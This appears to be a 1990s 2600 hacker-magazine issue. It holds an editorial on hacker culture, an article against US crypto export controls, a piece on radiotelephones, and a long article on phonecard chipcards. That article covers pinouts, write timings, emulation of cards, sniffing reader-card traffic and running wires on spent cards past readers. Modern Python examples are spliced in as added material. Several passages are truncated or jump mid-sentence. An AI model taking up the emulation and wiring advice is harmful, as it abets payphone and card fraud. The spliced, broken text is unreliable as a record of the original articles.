“Some of the computer attack tools, such as SATAN, are now so user-friendly that very little computer experience or knowledge is required to launch automated attacks on systems. Also, informal hacker groups, such as the 2600 club, the Legions of Doom, and Phrackers Inc., openly share information on the Internet about how to break into computer systems. This open sharing of information combined with the availability of user-friendly and powerful attack tools makes it relatively easy for anyone to learn how to attack systems or to refine their attack techniques.” - General Accounting Office report entitled “Computer Attacks at Department of Defense Pose Increasing Risks”.

The only names they got right in this quote were SATAN and Internet.
KNOWLEDGE IS

What makes the hacker world come alive more than anything else is newness. New technology, new ideas, new challenges, new people. We’re fortunate to live in an age where all of these are in abundance.

But too often, we fall into the age-old trap of complacency. We do the same old thing, time and again, until it no longer is any fun. Before long, we hold little interest in new ways of doing things and the development of new technology is passed, once again, to the next generation. It’s almost a human trait - we see the same behavior manifest itself in the music and film cultures, not to mention within our own social lives.

The hacker culture does not have to fall into this trap. In fact, it’s a double tragedy when it happens to us because of the vitality of newness in everything we do. While it’s inevitable that some of us will wind up working "establishment" jobs - perhaps becoming CEO’s of Fortune 500 companies or putting Bill Gates out of business with software that really works - we don’t ever have to abandon that spark of life known as the hacker spirit. Those of us who built blue boxes in the sixties, played with CP/M in the seventies, or hacked the Arpanet in the eighties should be keenly aware of today’s new toys, whether they be DVD’s, PCS phones, or smart cards. This awareness extends into the sociopolitical arena out of necessity - the latest attempts to quell our enthusiasm and desire to spread information are every bit as important as those which occurred in years past.

It’s easy to dismiss today’s beginners as newbies, AOL kids, or leeches who want easy answers. It would be a sad mistake to fail to distinguish between those who indeed have no interest in true hacking and those who are the future.

Over the years we’ve seen divisiveness develop for all the usual reasons - generational, national, regional, even sexual. Ideologically though, a great majority of the hacker world seems to stand for the same thing. We’re certainly not all on the same political wavelength but that’s a petty detail at best. What we share is the understanding that free speech is paramount, individuality is a valuable asset, and that the net - which was developed with the hacker spirit - is potentially the most valuable tool that free speech, individuality, and hence humanity itself has ever had at its disposal.

While divisiveness can be fun, it ultimately winds up destroying, or at least greatly hurting, whatever community it affects. That would be of great benefit to the people who want us to go away so they can control and regulate technology, speech, society, or whatever it is they’re after. Every act of factionalization is a victory for them. Each time a hacker from the sixties calls the FBI to investigate “some punk kid” who breaks into his machine, we all lose something. And every time someone new to the scene dismisses the hacker culture of years past, the potential river of knowledge is reduced to a trickle. Such examples multiplied are all that is needed to eliminate the “hacker threat”.

We need to know why what happened to Bernie S. is a clear threat to hackers everywhere, as is the continuing imprisonment and persecution of Kevin Mitnick. We need to know where to draw the line - defending people who, for example, commit credit card fraud or cause intentional damage to computer systems by considering them part of the hacker world is ultimately self-defeating.

We need to remember that we are all individuals in this culture and that being part of an image conscious hacker “group” can often obscure the real issues. New people are often wrongly intimidated into silence by big names who cover up their own ignorance with bravado. It happens everywhere but it doesn’t mean we’re doomed to repeat history. If anyone can escape the predictable, it should be hackers.

One other very important thing we must be careful of is the temptation of true crime. While society is increasingly unable to tell the difference between crimes of curiosity and mischief and those of genuine criminals, we don’t need to be as obtuse. Yes, it’s easy to make quick and dirty money with some basic hacker skills. You can sell passwords, calling cards, credit histories, or cloned phones. But once that world is entered, the spirit of adventure and discovery is replaced by the incentive for profit, almost always permanently. Not to mention that you turn into an utter sleazebag. It’s up to all of us to see that we're not polluted by such subversion. It’s up to our enemies to see that we are.

As we enter our 14th year of publishing, we recognize the risks of succumbing to that which we warn others about. Over the years, we’ve tried to remain true to our ideals and to not be adversely affected by our ever-increasing exposure to the mainstream. We have a no-advertising policy which we intend to continue. We pledge never to “tone down” what we do in order to become more marketable. We promise to continue to give new and established writers the same opportunity to be heard.

The rest is up to you. We want to always have the edge in reporting on the newest technological toys, as well as continuing fun and games with existing phone and computer systems. And we can never forget the social issues that go with these. Those of you who have the knowledge also have the opportunity to share it with the rest of us. In so doing, we are all strengthened and motivated.
by Seraf
seraf@2600.com


Encrypted data communications is quite possibly the least understood piece of the popular Internet culture’s technological backbone. Perhaps this is because cryptology is not trendy technology, but rather a complex science which is only beginning to be well-understood. Since the times before Christ, the study of secret writing, or cryptology, has played an important but largely invisible role in government. In fact, the Caesar Cipher (as in Julius) now appears in nearly every textbook on the subject.

But don’t use an ancient code for anything more than slipping cuss words through monitored E-mail. While the Roman Empire’s system simply rotates the alphabet three places, turning A's into D’s, B’s into E’s, C’s into F's, etc., present-day cryptographic algorithms are much more complex. While pen and paper can break a simple substitution cipher like Caesar’s on short notice, cracking most any of the heavy-duty cryptosystems developed over the past twenty years requires more time and more computing power than potential adversaries apparently have.

Cracking modern cryptosystems by brute force - trying every possible key until one “works” - usually takes a huge amount of time and/or money. Many newer symmetric cryptosystems use 128-bit keys, and this key size seems to have become a standard minimum in recent years. Building a machine to guess such a key within a year would presently cost billions of billions of dollars (no kidding) and require quite a feat of engineering. Many symmetric ciphers, though, use a smaller key. The Data Encryption Standard (DES) uses a 56-bit key, and (disregarding the shortcuts available for breaking DES) its messages can be cracked by brute force in a month with equipment costing well under $1 million. It is a fact that the National Security Agency (NSA) has such equipment ready and waiting, as do many other i… private - from American Ex… Government to CalTech.

What is really at issue here is the value of the potentially obtained information to a privacy-invading party. Uncle Sam will not take a chunk out of the Defense Budget, nor allocate a sizable portion of NSA’s computing power, in order to discover the key you’re using to send articles to 2600. But he will - at the very least - put a few hundred thousand dollars worth of computers to work for a month on your e-mail if he thinks you’re spending your afternoons meeting with Saddam. These days, cryptosystems with keys of about 56 bits are not trusted to keep data secure for more than a few days or weeks. 64-bit keys are a significant improvement, and may secure data for decades. 128-bit keys are currently rated at 50 years, and slightly longer keys at about 100. (With computing power and resources on the rise, it’s good to take these statistics with a grain of salt.)
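
As an added example (not from the article), here is the Caesar shift described above beside the 26-key exhaustive search that breaks it, and the same exhaustive search costed for the 56-, 64- and 128-bit key sizes the article quotes. The keys-per-second rate is an assumption derived from the article's own "56 bits in a month" figure, so the 64-bit result lands in the "decades" the text mentions.

```python
import string

ALPHABET = string.ascii_uppercase
SECONDS_PER_MONTH = 30 * 24 * 3600
SECONDS_PER_YEAR = 365 * 24 * 3600
# Rate implied by "56-bit key ... cracked by brute force in a month"
# (assumption: one machine, whole key space, no DES shortcuts used).
DES_RATE = 2 ** 56 / SECONDS_PER_MONTH


def caesar(text, shift):
    """Rotate letters by `shift` places (3 = the Roman system); other characters pass through."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def break_caesar(ciphertext, crib):
    """Exhaustive search over all 26 keys ("pen and paper on short notice").
    Returns the shift whose decryption contains the expected crib word."""
    for shift in range(26):
        if crib.upper() in caesar(ciphertext, -shift):
            return shift
    return None


def brute_force_years(key_bits, keys_per_second=DES_RATE):
    """Years needed to try every key of a key_bits-bit cipher at the given rate."""
    return 2 ** key_bits / keys_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    ct = caesar("attack at dawn", 3)              # constructed sample message
    print(ct, "-> shift", break_caesar(ct, "dawn"))
    for bits in (56, 64, 128):
        print("%3d-bit key: %.3g years of search" % (bits, brute_force_years(bits)))
```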

Of course, all of this depends on the security of the algorithm being used. Cryptanalysis, the Zen of cipher-cracking, has become as much of a science as cryptography itself. DES has had significant holes poked in its weak sides by a number of cryptanalysts over the years, as have numerous other algorithms created by corporations, universities, and brilliant mathematicians alike. The best route is to use a well-respected crypto package. Experimenting with your own ciphers can be fun, but will often lead to disaster if implemented for communications which must be reliably secured.

Right now, the U.S. government holds what may be the best cryptographic technology in existence. Skipjack, the algorithm implemented in Capstone and the much-criticized Clipper Chip, is classified, but is likely to be far ahead of current crypto research in the scientific community. (Note: One of the few civilians allowed to review the algorithm was Dorothy Denning, a slightly overzealous Georgetown University professor who is opposed to all non-government use of crypto.) When the National Security Agency - perhaps the most secretive publicly-known sect of our government - created the Data Encryption Standard in the mid-1970’s, it was optimized to be resistant to differential cryptanalysis. It was not until 1990, however, that this method of crypto-cracking was publicly discovered by the notorious Eli Biham and Adi Shamir. This means that not only are today’s government cryptosystems designed to resist attacks that won’t be in use for twenty years, but that the government is ready to deploy those futuristic attacks against the algorithm you’re using today. Does this secret research not defy the scientist’s ethic to share knowledge and information?

This is only the beginning of a growing U.S. government cryptomonopoly. New encoding algorithms are being developed in America constantly, and 2600 would be an ideal forum for their review and discussion. However, because of the U.S. Defense Trade Regulations (DTR) and 2600's international readership, they cannot be detailed here: our favorite rag would be busted for trafficking in munitions, “transferring [cryptographic] technical data to a foreign person” (DTR 120.10). See for yourself: the United States Munitions List includes, along with plastique and land mines, the following items: “Speech scramblers, privacy devices, cryptographic devices and software (encoding and decoding)...” (DTR 121.1). Even documents describing “unapproved” cryptosystems or listing their source codes are munitions.

What is “approved”? RSA’s nonthreatening authentication facilities have been deemed exportable, but its unmatched public key encryption remains restricted to domestic use, along with PGP and other RSA-bearing products. Superslick modern systems like RC4 have been given the green light to appear in such globally available products as Netscape, but only after security-reducing modifications. Then there are the algorithms denied export altogether, or that won’t even be given a hearing. Such has been the fate of Granddaddy DES, as well as that of many cryptosystems being developed at the undergraduate and graduate levels in American universities.

This is without question a breach of our First Amendment rights. If you design a cryptosystem, you are forbidden by your government to share it with whomever you please. Approval is required. We have had trade restrictions placed on our ideas. Exporting information which is “required for the design... of defense articles” (DTR 120.23) is illegal - so a book such as Phil Zimmerman’s “PGP Source Code and Internals” is by definition banned for export. (If you thought that banned books were a thing of the past, think again.) Even a foreigner on American soil is technically forbidden to examine such a publication at the corner bookstore.

American cryptologists are considered to be the best in the world, and the majority of strong cryptosystems originate in U.S. companies and universities. This technology has brought electronic privacy and freedom to Americans who put it to good use, and could do the same for citizens of other nations if it was not so feared by the powers that be. If we don’t act soon, restrictions on the domestic use of cryptographic technologies are just around the corner. Legislation to impose such constraints on the American people has already been introduced on at least one occasion, nearly forcing all available cryptosystems to be made readily crackable by Big Brother.

Simply put, NSA is scared: terrified of Americans enforcing their own privacy with such strength; living in fear of foreign government organizations, businesses and individuals obtaining the same level of security as their American counterparts.

Use crypto anywhere you can - and make sure it’s strong. Fight the U.S. government ban on knowledge and its underhanded attempts to thieve the world of digital privacy. U.S. citizens - write to your senators and congressmen and explain how important this technology is to every citizen of the Electronic Age, here and abroad. Foreign citizens - obtain source code to strong European algorithms such as Xuejia Lai and James Massey’s IDEA, and make every attempt you can to secure “restricted” algorithms. Raise your voice!
by Equant


There are a few reasons for this article. First, several years ago while cruising around New Mexico with a good friend we ran across a radiotelephone. It was in a park, and I’ve always assumed it was for park rangers to use. We horsed around with it and didn’t accomplish much. Had we been prepared for what we found we might have been more successful. Another reason for this article is that radiotelephones are common outside of the United States, and I’ve always enjoyed 2600’s drive to inform everyone around the world. The last reason is I’ve never seen much said about radiotelephones. So read the following, and if you run into a radiotelephone in the woods you'll know it’s not a complex weather station.

Radiotelephones are used to connect isolated areas to a phone network without the installation of phone lines. Some places you might find a radiotelephone would be in remote industrial parks, islands, and isolated communities such as state militia headquarters, cult compounds, and communes.

There are a few different types of radiotelephones. It seems that Optaphones and Ultraphones are the most popular. Radiophones usually operate somewhere between 30MHz and 3000MHz. All users of radiotelephones (in the U.S.) need FCC licenses (hooray for the FCC!). They are all full duplex and can use standard phone equipment on the subscriber’s end (i.e., the subscriber gets an RJ-11 jack to plug a normal phone into, or a modem or a fax). I’ve not heard of a radiotelephone that can transmit data over 9600bps.


Optaphones

These systems are for individuals or small groups of people. First we need to travel from the telco’s switch along a phone line to the middle of nowhere. Once the line ends we’ll find a base unit. The base unit has a power supply (perhaps a battery and a solar panel), a phone box, and a yagi antenna. The yagi antenna of course is pointed at the subscriber’s yagi antenna which is connected to their box which is connected to their phone.

There is an Optaphone called the Community Optaphone Star which is a similar setup to the above, with the two yagi antennas, but you have a more complex subscriber box which can operate 24 trunks at once. With this system you can have 96 subscribers. Keep a look out for this system in Alaska, Montana, and Pennsylvania.


Ultraphones

Ultraphones are mostly purchased by telcos. They are not one subscriber systems like the Optaphone. The Ultraphones support true digital local loop service and can handle 896 lines and 95 full duplex trunks.

Like the Optaphone it has two components, the subscriber side and the host side. The host’s end has two parts. In the telco’s central office is the Central Office Terminal (COT). The COT is a PBX with a VF loop level connection to the central office. From the COT the signal is sent to the Radio Carrier Station which sends the signal up a large radio tower. (Note this is an omni directional antenna and not a yagi antenna.) The signal is not line of sight, and can reliably go 60km/37.5 miles.

On the subscriber’s end you have a yagi antenna connected to a radio modem and power supply. The subscriber unit can handle normal RJ-11 phone equipment, with DTMF and pulse dialing. The subscriber broadcasts somewhere from 454.025 MHz to 454.650 MHz and receives between 459.025 MHz and 459.605 MHz. Each channel is separated by 25 kHz, and each channel can contain four trunks.

The signal goes from the subscriber’s mouth into the subscriber’s phone. The analog signal is then converted into a 14.57 kb/s digital signal. The signal is modulated and transmitted at a rate of 64 kb/s. This signal is multiplexed with three other signals in order to obtain the four trunks per channel.


Locations in the U.S.

There are 120 systems in the U.S. Most of them are west of the Mississippi River. I’m not sure of all the locations, but here’s what I do know. There is at least one system in Florida, Maine, California, and New Mexico. There are two in Arizona, one on the Navajo reservation. GTE in Texas has 30 systems. The most interesting is that Big Bend Telco, southeast of El Paso, serves two thirds of its exchanges (25,000 square miles) with 15 systems.


Locations outside the U.S.

Worldwide there are over 300 Ultraphone systems. Here’s a list:

Indonesia 46
Mexico 39
Philippines 26
Myanmar 07
Puerto Rico 05
Russia 05
Brazil 04
Colombia 04
Canada 03
Sri Lanka 03
Haiti 02
Korea 02
China 01
Kuwait 01
Nigeria 01
Taiwan 01
Venezuela 01
by Billsf

You paid for your chipcard and it is rightfully yours! Here are some hints to test the card and find out its secrets. The synchronous card is fully static. You can single-step the clock and record the characteristics accordingly (see schematic for special reader/writer). The analog characteristics are extremely important. “Analog” in this context means timings, rise times, and characteristics of the I/O at different phases of the process.

While the exact timings and content of last year’s cards will be explicitly detailed, you want to be able to keep up with the game and analyze cards from other countries before you get there. In other words, if your emulation does exactly what the official version does, your “card” is therefore the real thing in all respects.


Introduction

In the following pages we will explore chipcards, their types and possibilities. All information in this piece is public, either from international documents or derived from the card itself as in the case of the analysis of the Dutch and French phonecards. No laws were broken in obtaining this information and it is expected that the reader will consider this a new area to hobby with. Criminal use of this information is on the criminal himself and in no way do we encourage fraudulent use or damage to existing systems. It will be up to the user to decide what uses of the emulator are ethical or legal. There is presently questionable software available for the smartcard “inverse reader” on the net.

Some of you will find that spent phonecards make very secure keys for electric locks. More ambitious hobbyists will want to experiment with true processor cards. In this case the manufacturer will provide software tools to program the card. It will be up to the individual to develop their own system. In the meantime the “inverse reader” can be used to emulate existing chip masks. Tools to do this may be available from manufacturers of chips for cards. Prices of smartcards can be as little as $2 for ones with simple processors and small memory to over $15 for chips that can handle RSA, have larger memories, and overall better security. In any case the minimum order is likely to be over 100 cards. Small quantities of conventionally packaged chips (dil-8) can be obtained for development. All processor cards are capable of crypto. It is suggested that openly available systems like DES and IDEA be used to secure the cards. On the more expensive cards, you can implement PGP! If you try to implement your own “blackbox” it will surely be cracked unless you have a great deal of expertise in this rather obscure and closed field.

This article is geared towards the hardware aspect of chipcards. It will be up to the reader to obtain or write software tools. The schematics are for “professional quality” industry standard tools. You will save hundreds of dollars by building your own! The designs are strictly mine and any commercial use will be considered an infringement.

While the original scope of this article was to cover the memory cards or, simply put, “dumb cards”, it is generally agreed that they are obsolete. PTT’s will continue to use them for years to come, but in the more developed world, a changeover is likely to occur soon. Holland, Germany, and France are almost surely to be first. However, just about every country except the USA has a phonecard with value on it. (It should be noted here that NYNEX is experimenting with the old-fashioned diffraction grating cards once in common use in Europe. Also note that the system of billing for a call is not readily compatible yet in North America.)

We will begin with a comprehensive analysis of memory cards and their workings. From this information it will be possible to emulate them. We will discuss security tactics used to discourage this. The sharp reader will learn that it is easier to emulate a “dumb card” than to read/write one. The intelligence is in the card reader along with all the safeguards, which include things like “wire detection”, “swallowing the card”, and “blacklisting” abused series numbers.


Chipcards

What is a chipcard to start with? It is generally seen as the familiar phonecard seen in an ever increasing number of countries. It was first produced in France under license from Bull S.A., a well known computer firm. The information is public and is described in ISO/IEC 7816. This multi part document describes the physical requirements of the cards and chips in the first two parts. The third supplies the recommendations for both sync and async chips. Other parts have been added over the years as the technology has matured.

Most people think these telephone cards are the much touted “smartcards”. In fact, all prepaid telephone chipcards are just memory cards often referred to in the industry as “dumbcards”. At present manufacturers often refer to security as using different types of memory, security fuses, and special undocumented security features. The Siemens SLE4404 is a good example of a multipurpose memory card. This is quite possibly the German phonecard which has been said to be reloadable up to 100 times. This datasheet mentions this feature, but one must know a 16 bit code to get in, which is apparently databased by Telekom. The other option is to blow a certain security fuse and the card is irrevocably single use. Pin 4 is test and pin 8 is that fuse pin. Both become open (not connected) when the card is secured. They are the bottom contacts on eight contact modules. Many one use cards dispense with these contacts altogether.

At present there are two major types of memory card on the market. Both types have their own unique method of marking value and methods of security. The French type is probably less expensive than the German type mentioned above, has been in use longer, and is used in most countries that use chips for phones. Modern readers could read both of these memory cards and processor cards too. Either through politics or mistrust of each other’s systems, most memory cards are limited to the country issued. Other prepaid card systems include three types of magnetic card and the diffraction grating card. The chips are likely to replace all of these older types. It is suspected many nations are waiting for the more secure processor type before changing over.

First came the French card for France around 1986. It used the “French position” formally called AFNOR. The ISO position came later, in 1989. The chip module was rotated 180 degrees and placed directly below, as continuing the 2.54mm spacing. (Looking at a standard ISO card, the French position is directly above when the card is viewed in the normal horizontal position with the module to the left.) This original version was a pathetic fuse-link ROM that was quickly cracked by students. This outdated system can be found in India and perhaps other third world countries. Failure of both the cards and readers was very common. “Fuse-link” ROM also implies a power hungry bipolar technology where a high current pulse is needed to burn a unit.

The new card adopted the ISO position and uses a NMOS, EPROM technology. 21V +/- 2.5% is applied on the Vpp pin to alter the card. The value is stored as “units” and the largest card contains 120 and perhaps 10 bonus tics. There is room for a maximum of 152 units (see memory map). The total usable memory area, fixed and changeable, is 256 bits. Included are country codes, manufacturer codes, the initial value, and the last byte contains FF if the card is new.

The “Rest Of the World” version has a slightly different format in the first twelve bytes. While the old versions burned the card in a linear fashion which was provided with the number of units needed, newer versions place more tics than needed in a particular order determined by the info in the first part of the card. A crypto algorithm determines where the places will be from the series code and possibly other areas of the first 96 bits. This algorithm is not known to the author, but is apparently a proprietary one. Its purpose is to prevent mass emulation of the cards. It can be assumed that copying one card would allow many “re-uses” until it was “blacklisted” by the system. One would of course have to change to another phone to use a copy! It is not determined how the cells are updated in France and countries that use the similar system. (Any takers? French police tactics are downright scary!) When a card is used up, there will be remaining “units”. This is like a LOTTO at its best. Which 16 or 24 or more bits are not set out of a field of 152? The apparent key length is 56 bits and the “LOTTO field” has an astronomically larger range and could act as an extension in a double crypt system. It would appear to be something like DES and perhaps as secure or more so.

The NMOS output has levels much like TTL and is compatible to it without any pull-up resistor. The French cards use an active low RST on pin 4. The Vpp is on pin 6 and is +5V while reading and upped to +21V to modify. Pin 2 is R/W and is low (0) unless a modification is to be made. When 1, the Vpp is expected. The CLK is pin 3 and the “I/O” is pin 7.

The system used in Holland is based on the German system that appeared in 1989. While the card uses a large number of possible security measures, only a few are actually checked in either country. The card operation and method of storing value are completely different than the French type (see memory map). There are 512 possible memory locations. The card itself contains much of the security. A full rundown of all security measures will be presented (see timing diagrams).

Power-on-reset: If the CLK is 0 and the re- 
set is one, the I/O sources current. A proper re- 
set is RST to 1, a single CLK pulse to 1 and 
back to 0, and then RST to 0. It has been found 
the card will reset when the RST falls before 
the CLK. This may be one of the “undocu- 
mented” security features. The I/O is the clock 
inverted with the addition of current sourced 
when the RST is 1. Rise and fall times are very 
fast and well under 20nS! The sink current is 
twice the source current as would be expected 
using equally sized N and P channel fits in a 
CMOS arrangement. 

Here is the performance of a typical card. 
With the RST 1 and the CLK 0, the output will 
source 4mA at 4V or put another way there will 
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be a one volt drop if 1k0 is placed from the out- 
put to ground. This is the only occurrence of 
this chip sourcing current. This chip (like all 
known CMOS chipcards) normally relies on an 
“open drain” output. It will pull a 1k0 resistor 
tied to Vcc to 0.5V, (At this point it should be 
noted that 6k8 is the standard value used to 
pull-up the output.) On testing about 100 cards, 
the propagation delay between the CLK to out- 
put into +/-30pF ranged between 18 and 20nS 
for the output falling and 33 to 37nS for the 
output rising with no resistive load. This is 
most certainly a security feature. 

CLK to DATA out: For a read, the CLK must be 1 for at least 450nS. However this value is transferred to a flip-flop so when CLK falls, the data is ready in about 42nS, going from 1 to 0. The data is read through an open drain output (the I/O) and is pulled up by a 6k8 resistor in the phone. Going from 0 to 1 under ideal conditions, the propagation delay is 55nS. Additional risetime formed between the 6k8 resistor and the capacitances of the card and reader are likely to add over 150nS. The capacitance of the standard Landis & Gyr reader is about 30pF. If this value is tightly controlled, the risetimes can reveal additional capacitance and possibly reject a defective card. A good card would be expected to have less than 10pF at its output.

[Timing diagram (pin 2 RST, pin 3 CLK, pin 7 I/O, internal PC; T = test, F = fuse): if RST has remained 0 during the 0 portion of CLK, then PC increments on the up-going flank of CLK.]

Modifying data: A “write” is defined as changing a 1 to a 0. An “erase” is defined as putting all zeros in a lower value field to all 1’s. To perform a write, an RST pulse is generated while the CLK is 0. (This pulse can be as little as 1uS.) The clock is then specified to remain high (1) for 10mS to allow time to zap the bit. On the actual card, this CLK pulse can also be about 1uS, which allows the measurement of the time actually required to change the bit. It has been found to be about 2mS which is far shorter than the worst case specified. There is probably nothing to do with security here, except the CLK is masked out during the write period on the newer cards. A read can be performed only if the last operation was a successful write (bit changed from 1 to 0). When the CLK is once again 0, another RST pulse is applied and the CLK is specified to remain 1 for 10mS while all eight bits of the next lower value field are changed to 1. (In other words you cannot add more value than you removed. As each bit in a lower value field is 1/8 that of a higher value field, zapping a higher value field bit when all the lower value field bits are 0 will restore those bits.)

[Timing diagrams: “Normal read and reset” (bit 1 output) and “Abnormal reset” (will reset).]

Series number: Chips are made in lots of 
100. Each lot has its own number. Through cen- 
tral administration it is possible to monitor 
fraud and cancel cards that appear to have been 
used for more than 100 times its value. In gen- 
eral the machine will not care if the number is 
in range and not in its memory of cards to re- 
ject. While not as clever as the French method, 
it will serve to keep criminal and lamer abuse 
down! 

Much of the card, like the series number, cannot be altered. There are only 36 “value bits” on most cards. (The older cards had a 1/8 cent subfield that could be written.) There are however a total of 80 bits that can be set to 0 and stay that way. Trying to write in most “forbidden” areas will do nothing, but in certain areas the card is frozen (program counter doesn’t increment anymore) if a write is attempted. These all appear to be security measures that could be taken to verify a card but it is apparently never done.


Future Imperfect 

The PTT will not always use dumb cards. In fact the present system can read some basic “challenge response” cards now available. The DES-like key is stored on each card and getting the key from one card opens the whole system to the cracker. The 64 bit challenge is issued from another smartcard inside the phone. Their card contains the same key as the one you own. Therefore a “randomly” generated challenge is crypted and sent to your card. Your card uses the key to decrypt this and sends the initial “random” 64 bits back to the reader on the phone. If a match has occurred, the phone will deduct the cost of a tic. This is fast enough to make each and every tic a separate transaction. Almost every smartcard system uses this method and it is only a matter of time until the keys get out. Other key distribution methods could be used to prevent the problem of keeping all one’s secrets on each card. In general, the PTT will go no further than what hackers show is insecure.
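The weakness described above, one key on every card and the same key in the phone, modelled as an added example that is not the PTT's design or code. The DES-like cipher is stood in for by a keyed MAC, the card applies it to the challenge rather than decrypting it, and the key, serials and master key are constructed values; the second scheme is a per-card key derived from a master kept only in the phone-side SAM, one of the "other key distribution methods" the text alludes to.

```python
import hashlib
import hmac
import secrets

# Added model, not the PTT's design or code. The article's DES-like card cipher is stood in
# for by a keyed MAC truncated to 64 bits, and the card applies it to the challenge rather
# than decrypting it. What is compared is the trust structure: one key on every card (the
# scheme the article describes) against a per-card key derived from a master key that only
# the phone-side SAM holds.

MASTER_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed value


def mac64(key: bytes, data: bytes) -> bytes:
    """Keyed 64 bit transform standing in for the card's DES-like operation."""
    return hmac.new(key, data, hashlib.sha256).digest()[:8]


def diversified_key(master: bytes, serial: bytes) -> bytes:
    """Per-card key derived from the master key and the card's serial; the card stores only this."""
    return hmac.new(master, b"card-key|" + serial, hashlib.sha256).digest()[:16]


class Card:
    def __init__(self, serial: bytes, key: bytes):
        self.serial = serial
        self.key = key                  # the secret a cracker wants out of the card

    def respond(self, challenge: bytes) -> bytes:
        return mac64(self.key, challenge)


class PhoneSAM:
    """The smartcard inside the phone. diversify=False: it holds the one key every card
    holds too. diversify=True: it holds only the master key and derives each card's key."""

    def __init__(self, master: bytes, diversify: bool):
        self.master = master
        self.diversify = diversify

    def key_for(self, serial: bytes) -> bytes:
        return diversified_key(self.master, serial) if self.diversify else self.master

    def issue_card(self, serial: bytes) -> Card:
        return Card(serial, self.key_for(serial))

    def authenticate(self, serial: bytes, responder) -> bool:
        challenge = secrets.token_bytes(8)              # the "randomly" generated 64 bits
        expected = mac64(self.key_for(serial), challenge)
        return hmac.compare_digest(expected, responder(challenge))


def clone_accepted_as(sam: PhoneSAM, leaked_from: Card, claimed_serial: bytes) -> bool:
    """The risk the article names: a key read out of one card, replayed by an emulator
    presenting some serial. Returns whether the phone accepts it."""
    emulator = Card(claimed_serial, leaked_from.key)
    return sam.authenticate(claimed_serial, emulator.respond)


def exposure_report(diversify: bool) -> dict:
    """Issue two cards, assume card A's key has leaked, and record what that buys."""
    sam = PhoneSAM(MASTER_KEY, diversify)
    card_a = sam.issue_card(b"LOT0042-SER0001")   # constructed serials
    card_b = sam.issue_card(b"LOT0042-SER0002")
    return {
        "genuine_b_accepted": sam.authenticate(card_b.serial, card_b.respond),
        "leaked_a_passes_as_a": clone_accepted_as(sam, card_a, card_a.serial),
        "leaked_a_passes_as_b": clone_accepted_as(sam, card_a, card_b.serial),
    }


if __name__ == "__main__":
    print("shared key: ", exposure_report(False))
    print("diversified:", exposure_report(True))
```

With diversified keys a leaked card still authenticates as itself, which is what the series-number cancellation described earlier has to catch; it no longer opens every other card.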


Determining Card Type 

The synchronous card is clocked at 50kHz to read and has an “active high” reset. The async card is usually clocked at 3.58 MHz and has an active low reset. The processor card will probably not function much below 1 MHz anyway, so on this alone the machine can check for card type. There is no specified way to determine card type as the three types are greatly different. The French cards also have an active low reset and so do some special purpose cards that are generally used as keys. In any case the differences between types are great enough that there needs to be no standard to tell them apart.


Processor Card Emulation 

All the emulation must do is see the reset 
rise and then answer with the standard “I’m 
here” response. This response is expected 
within 11mS, but may come as early as 112uS. 
(In emulation the RST asserts the CTS of the 
RS232 port.) At this point the “card” I/O is an 
input (default) and waits for further instruc- 
tions. In computer terms, the format is 9600 
bps, start plus eight databits, a parity bit, and 
two stopbits minimum. 

In many systems, the “inverse reader” is used to program the card device. To do this one must know how to answerback with a message saying “I have more for you.” At this point a whole new identity can be loaded or audits conducted. It is likely the speed will be increased to 19.2 or 38.4 kbs for “security” or time savings. Every “facility card” is different and either development of your own or leaked knowledge of present types is needed to gain entry to the card itself. You can however reset the card and get an answer, then issue it a challenge and get a response. Improper challenges often result in getting an ASCII ‘n’ (for no?) back. Certain control characters will give predetermined test responses, but only properly framed (and typically 64 bit) challenges will produce a normal
cards use crypto. In the industry this is called “mag stripe emulation”. The German medical card is a fine example of a nonsecure system. Since the card is readable and writable in the clear, junks, for instance, can get all the dope they need with the help of a hacker. To hack such a system all one must do is monitor the protocol between the reader and card. Inverting the I/O and connecting to the RxD pin of a terminal at 9600 and proper settings will expose the “conversation”. To do this you need a “card” and socket to form a sort of breakout box. More sophisticated systems could segregate out what the card says and what the reader says.

Besides, you are likely to waste quite a few cards before you get results even if using a proven technique.

[Diagram, not to scale, of wire placement on a spent card: for systems where the card is inserted horizontally, wires can be connected and run on top of or below the module; for systems where the card is inserted lengthwise, run the wires to the far end from the module, placement is not critical in this case; bring 0.22mm wires (or thinner) to the lower centre of the card.]


Metal Detectors, Wire Detection

what they are doing. As mentioned in the security area, there is a simple check for risetime on an open drain output. The time to cross the CMOS threshold is approximately 0.7RC. R is 6k8 in just about any reader and C is typically 5pF for a CMOS input and max of 10pF. A simple grid plate can check for the clock appearing where it should not. A small coil is supplied to check for the presence of wires attached, printed circuit traces, and induced signals.
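The risetime check, as the reader side would apply it, written up as an added example (not the article's or any reader maker's code) serving both the capacitance discussion under “CLK to DATA out” and the 0.7RC rule above. The figures used are the article's (6k8 pull-up, 55nS intrinsic delay, about 30pF for the reader, a good card under 10pF); the tolerance and the sample readings are constructed.

```python
# Added example, not from the article: turns the article's open-drain risetime check into a
# small screening routine. Figures taken from the article: 6k8 pull-up, ~55nS intrinsic 0->1
# delay, ~30pF reader capacitance, a good card under 10pF, threshold crossing at ~0.7RC.
# The tolerance and the sample readings are constructed.

R_PULLUP_OHMS = 6800.0
INTRINSIC_RISE_NS = 55.0       # card's own 0 -> 1 propagation delay under ideal conditions
READER_PF = 30.0               # standard Landis & Gyr reader, per the article
GOOD_CARD_MAX_PF = 10.0        # what a genuine card should stay under
TOLERANCE_PF = 3.0             # constructed allowance for reader-to-reader variation


def rc_rise_ns(total_pf: float, r_ohms: float = R_PULLUP_OHMS) -> float:
    """Time for the open-drain line to cross the CMOS threshold: about 0.7 R C.
    R in ohms times C in pF gives 1e-12 s units, so divide by 1e3 to get ns."""
    return 0.7 * r_ohms * total_pf / 1e3


def expected_rise_ns(card_pf: float, reader_pf: float = READER_PF) -> float:
    """Total 0 -> 1 time the reader should see: intrinsic delay plus the RC tail."""
    return INTRINSIC_RISE_NS + rc_rise_ns(card_pf + reader_pf)


def implied_card_pf(measured_rise_ns: float, reader_pf: float = READER_PF,
                    r_ohms: float = R_PULLUP_OHMS) -> float:
    """Invert the estimate: strip the intrinsic delay, solve C = t / (0.7 R),
    then remove the reader's own share of the capacitance."""
    rc_tail_ns = max(measured_rise_ns - INTRINSIC_RISE_NS, 0.0)
    total_pf = rc_tail_ns * 1e3 / (0.7 * r_ohms)
    return total_pf - reader_pf


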